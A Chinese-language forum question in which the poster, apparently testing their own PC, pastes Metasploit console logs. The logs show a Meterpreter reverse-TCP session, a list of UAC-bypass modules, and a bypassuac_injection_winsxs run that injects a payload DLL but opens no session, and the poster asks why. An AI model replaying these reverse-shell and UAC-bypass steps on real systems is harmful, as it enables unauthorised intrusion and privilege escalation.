我尝试使用 WSL 和 Kali 在我的 PC 上进行渗透测试,一切正常,直到在我的目标 PC 上创建并执行了有效负载,并恢复了会话。
- 完成第一步后,我得到:
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.9.88.222 lhost => 10.9.88.222 msf6 exploit(multi/handler) > set lport 8080 lport => 8080 msf6 exploit(multi/handler) > start [-] Unknown command: start. msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.9.88.222:8080 [*] Sending stage (175174 bytes) to 10.9.0.1 [*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530 meterpreter >
- 然而,主要问题出现在这里;我试图绕过 UAC 并获得系统级权限,尝试了 4 - 6 个模块,通过执行后的搜索结果获得
search uac
,执行后search uac
,我得到:meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > search uac Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs 1 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 3 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler) 4 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 5 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 6 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 7 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 8 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) 9 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup) 10 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 11 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 12 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) 13 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry 14 post/windows/gather/win_privs normal No Windows Gather Privileges Enumeration 15 post/windows/manage/sticky_keys normal No Sticky Keys Persistance Module Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys
我尝试了模块 7,收到:msf6 exploit(multi/handler) > use 7 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets Exploit targets: Id Name -- ---- 0 Windows x86 1 Windows x64 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1 target => 1 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1 session => 1 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222 LHOST => 10.9.88.222 msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080 LPORT => 8080 msf6 exploit(windows/local/bypassuac_injection_winsxs) > run [*] Started reverse TCP handler on 10.9.88.222:8080 [+] Windows 10 (10.0 Build 18363). may be vulnerable. [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Creating temporary folders... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [+] Successfully injected payload in to process: 9248 [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_injection_winsxs) >
- 一切顺利,但会话未创建,收到:
exploit completed but no session was created
- 我在详细模式下运行时得到此信息
[*] Started reverse TCP handler on 10.9.88.222:8080 [+] Windows 10 (10.0 Build 18363). may be vulnerable. [*] UAC is Enabled, checking level... [*] Checking admin status... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Creating temporary folders... [*] Uploading the Payload DLL to the filesystem... [*] Payload DLL 8704 bytes long being uploaded... [*] Spawning process with Windows Publisher Certificate, to inject into... [*] Injecting into process ID 10880 [*] Opening process 10880 [*] Injecting struct into 10880 [*] Executing payload [+] Successfully injected payload in to process: 10880 [*] Exploit completed, but no session was created.
- 我曾经使用过
Portmap.io
端口转发(免费计划),并安装了最新版本的 Metasploit 框架、WSL 2 和 Kali Linux 应用程序
- 一切顺利,但会话未创建,收到:
我该如何解决这个问题?